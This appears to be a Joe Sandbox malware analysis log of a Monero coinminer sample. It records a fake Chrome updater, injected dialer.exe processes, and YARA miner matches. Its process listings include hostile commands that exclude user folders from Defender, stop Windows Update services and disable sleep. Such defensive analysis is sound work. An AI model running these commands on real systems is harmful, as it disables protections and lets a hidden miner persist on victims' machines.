Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000014E41FAD0E0	30_2_0000014E41FAD0E0
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000014E41FB38A8	30_2_0000014E41FB38A8
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000014E41FA1F2C	30_2_0000014E41FA1F2C
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000014E41FDDCE0	30_2_0000014E41FDDCE0
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000014E41FE44A8	30_2_0000014E41FE44A8
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000014E41FD2B2C	30_2_0000014E41FD2B2C
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_000001D15B051F2C	31_2_000001D15B051F2C
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_000001D15B05D0E0	31_2_000001D15B05D0E0
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_000001D15B0638A8	31_2_000001D15B0638A8
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_000001D15B082B2C	31_2_000001D15B082B2C
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_000001D15B08DCE0	31_2_000001D15B08DCE0
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_000001D15B0944A8	31_2_000001D15B0944A8
Source: C:\Windows\System32\dialer.exe	Code function: 42_2_00007FF6429514D8	42_2_00007FF6429514D8
Source: C:\Windows\System32\dialer.exe	Code function: 42_2_00007FF64295226C	42_2_00007FF64295226C
Source: C:\Windows\System32\dialer.exe	Code function: 42_2_00007FF642952560	42_2_00007FF642952560
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023AF32C38A8	46_2_0000023AF32C38A8
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023AF32BD0E0	46_2_0000023AF32BD0E0
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023AF32B1F2C	46_2_0000023AF32B1F2C
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023AF32F44A8	46_2_0000023AF32F44A8
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023AF32EDCE0	46_2_0000023AF32EDCE0
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023AF32E2B2C	46_2_0000023AF32E2B2C
Source: C:\Windows\System32\svchost.exe	Code function: 50_2_0000023C9FD6D0E0	50_2_0000023C9FD6D0E0
Source: C:\Windows\System32\svchost.exe	Code function: 50_2_0000023C9FD738A8	50_2_0000023C9FD738A8
Source: C:\Windows\System32\svchost.exe	Code function: 50_2_0000023C9FD61F2C	50_2_0000023C9FD61F2C
Source: C:\Windows\System32\svchost.exe	Code function: 50_2_0000023C9FD9DCE0	50_2_0000023C9FD9DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 50_2_0000023C9FDA44A8	50_2_0000023C9FDA44A8
Source: C:\Windows\System32\svchost.exe	Code function: 50_2_0000023C9FD92B2C	50_2_0000023C9FD92B2C
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_000001A1CA6ED0E0	51_2_000001A1CA6ED0E0
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_000001A1CA6F38A8	51_2_000001A1CA6F38A8
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_000001A1CA6E1F2C	51_2_000001A1CA6E1F2C
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_000001A1CA71DCE0	51_2_000001A1CA71DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_000001A1CA7244A8	51_2_000001A1CA7244A8
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_000001A1CA712B2C	51_2_000001A1CA712B2C
Source: C:\Windows\System32\svchost.exe	Code function: 53_2_00000246ED7B1F2C	53_2_00000246ED7B1F2C
Source: C:\Windows\System32\svchost.exe	Code function: 53_2_00000246ED7BD0E0	53_2_00000246ED7BD0E0
Source: C:\Windows\System32\svchost.exe	Code function: 53_2_00000246ED7C38A8	53_2_00000246ED7C38A8
Source: C:\Windows\System32\svchost.exe	Code function: 53_2_00000246EDE62B2C	53_2_00000246EDE62B2C
Source: C:\Windows\System32\svchost.exe	Code function: 53_2_00000246EDE6DCE0	53_2_00000246EDE6DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 53_2_00000246EDE744A8	53_2_00000246EDE744A8
Source: C:\Windows\System32\svchost.exe	Code function: 54_2_00000200A19B2B2C	54_2_00000200A19B2B2C
Source: C:\Windows\System32\svchost.exe	Code function: 54_2_00000200A19C44A8	54_2_00000200A19C44A8
Source: C:\Windows\System32\svchost.exe	Code function: 54_2_00000200A19BDCE0	54_2_00000200A19BDCE0
Source: C:\Windows\System32\svchost.exe	Code function: 55_2_000002259668DCE0	55_2_000002259668DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 55_2_00000225966944A8	55_2_00000225966944A8
Source: C:\Windows\System32\svchost.exe	Code function: 55_2_0000022596682B2C	55_2_0000022596682B2C

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp F7E1E53A6FB24A2BD9206305C59448A8F99B6F5847A6ACB18EB0FD9F7383FFB4

Source: C:\Windows\System32\dialer.exe

Code function: String function: 00007FF75E942F50 appears 31 times

Source: hiwA7Blv7C.exe

Static PE information: invalid certificate

Source: bzqlyietdwsj.tmp.0.dr

Static PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Source: updater.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: hiwA7Blv7C.exe	Static PE information: Number of sections : 11 > 10

Source: 47.2.dialer.exe.246fae5cc20.0.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 47.2.dialer.exe.246fae5cc20.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 47.2.dialer.exe.246fae5cc20.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 47.2.dialer.exe.246fae38c60.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 47.2.dialer.exe.246fae38c60.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 47.2.dialer.exe.246fae38c60.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 47.2.dialer.exe.246fae35400.1.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 47.2.dialer.exe.246fae35400.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 47.2.dialer.exe.246fae35400.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: dialer.exe PID: 1060, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\bzqlyietdwsj.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: C:\Windows\Temp\bzqlyietdwsj.tmp, type: DROPPED	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Windows\Temp\bzqlyietdwsj.tmp, type: DROPPED	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: classification engine

Classification label: mal100.troj.adwa.spyw.evad.mine.winEXE@68/18@2/3

Source: C:\Windows\System32\dialer.exe	Code function: 14_2_00007FF68D3D226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,		14_2_00007FF68D3D226C
Source: C:\Windows\System32\dialer.exe	Code function: 42_2_00007FF64295226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,		42_2_00007FF64295226C

Source: C:\Windows\System32\dialer.exe

Code function: 14_2_00007FF68D3D19C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

14_2_00007FF68D3D19C4

Source: C:\Windows\System32\dialer.exe

Code function: 14_2_00007FF68D3D226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,

14_2_00007FF68D3D226C

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6268:120:WilError_03
Source: C:\Windows\System32\dialer.exe	Mutant created: \BaseNamedObjects\Global\qqgnfenfemxxtpha
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_03

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe

File created: C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp

Jump to behavior

Source: hiwA7Blv7C.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\dialer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\dialer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dialer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: hiwA7Blv7C.exe

ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe

File read: C:\Users\user\Desktop\hiwA7Blv7C.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hiwA7Blv7C.exe "C:\Users\user\Desktop\hiwA7Blv7C.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: unknown	Process created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc	Jump to behavior
Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
